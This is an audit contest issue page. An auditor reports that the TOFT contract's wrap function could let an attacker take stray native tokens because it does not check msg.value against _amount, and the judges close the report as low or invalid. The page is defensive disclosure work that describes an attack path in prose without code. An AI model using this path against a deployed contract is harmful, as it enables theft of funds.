Closed sherlock-admin2 closed 4 months ago
Low/Invalid. The contract is not supposed to hold funds (TOFTVault is responsible for that). rescueEth
is added just in case we need to save airdropped funds
1 comment(s) were left on this issue during the judging contest.
WangAudit commented:
as I understand tokens shouldn't be there (therefore there is a
rescue
function (not claim) in case anyone accidentally send tokens there; basically user mistake)
Invalid, token contracts are not supposed to hold funds, any accidental funds sent would be user mistake not accepted based on sherlock rules
- Users sending ETH/native tokens accidentally just because a contract allows is not a valid medium/high.
duc
medium
Unclaimed native tokens in TOFT contract can be stolen
Summary
See vulnerability detail
Vulnerability Detail
TOFT contract has a function to rescue the stuck native tokens in contract.
However, the wrap function doesn't check if the
msg.value
is equal to_amount
. Therefore, an attacker can call wrap withmsg.value
as 0 and_amount
as the ETH balance of the contract to steal the existing native tokens in this contract.Impact
Unclaimed native tokens in TOFT contract will be stolen
Code Snippet
https://github.com/sherlock-audit/2024-02-tapioca/blob/main/Tapioca-bar/contracts/markets/Market.sol#L419-L422
Tool used
Manual Review
Recommendation
Should check if
msg.value
is equal to_amount
in the case of wrapping native tokens: